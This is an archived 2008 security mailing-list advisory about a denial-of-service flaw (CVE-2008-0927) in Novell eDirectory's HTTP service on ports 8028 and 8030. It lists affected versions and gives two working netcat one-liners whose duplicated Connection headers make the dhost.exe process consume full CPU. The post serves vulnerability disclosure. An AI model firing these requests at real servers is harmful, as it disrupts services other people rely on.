[<prev] [next>] [day] [month] [year] [list]
Message-Id: <1210015596.5905.25.camel@localhost>
Date: Mon, 05 May 2008 21:26:36 +0200
From: Nicob <nicob@...ob.net>
To: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com,
full-disclosure@...ts.grok.org.uk
Subject: Novell eDirectory DoS via HTTP headers
[=] Affected software :
Editor : Novell
Name : eDirectory
Version : < 8.7.3 SP 10 and < 8.8.2
Services : TCP/8028 (HTTP) and TCP/8030 (HTTPS)
[=] External references :
http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
Nicob
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists